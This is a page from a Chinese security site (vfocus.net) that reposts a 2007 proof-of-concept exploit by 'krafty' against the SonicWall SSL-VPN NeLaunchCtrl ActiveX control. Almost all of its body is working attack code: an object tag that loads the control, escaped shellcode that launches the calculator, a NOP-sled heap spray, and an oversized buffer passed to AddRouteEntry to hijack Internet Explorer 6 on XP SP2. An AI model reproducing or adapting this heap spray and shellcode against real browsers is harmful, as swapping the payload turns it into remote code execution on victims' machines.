首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit
来源:www.vfocus.net 作者:krafty 发布时间:2007-11-02  
<!--

SonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.

by krafty

greets to SK, muts, halvar, grugq, and all the ethnical hackers

sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.

Bring back the days of technotronic and r00tshell! Freedom.

poc: launches calculator.
Tested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all
that jing-bang.

-->


<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>

<script>

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");

var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
   spray += spray;
} while(spray.length < 0xc0000);

memory = new Array();

for(i = 0; i < 50; i++)
   memory[i] = spray + shellcode;

buf = "";
for(i = 0; i < 50; i++)
   buf += unescape("%05%05%05%05");

nelx.AddRouteEntry("", buf);

</script>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP-AGTC membership system 1.1
·BC Explorer <= 7.20 RC 1 Remot
·Kodak Image Viewer TIF/TIFF Co
·Viewpoint Media Player for IE
·Sony CONNECT Player 4.x (m3u F
·IBM AIX <= 5.3.0 setlocale() L
·GOM Player 2.1.6.3499 (GomWeb3
·Adobe Shockwave ShockwaveVersi
·IBM Lotus Domino 7.0.2FP1 IMAP
·MySQL <= 5.0.45 (Alter) Denial
·IBM Tivoli Storage Manager 5.3
·Microsoft Internet Explorer TI
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved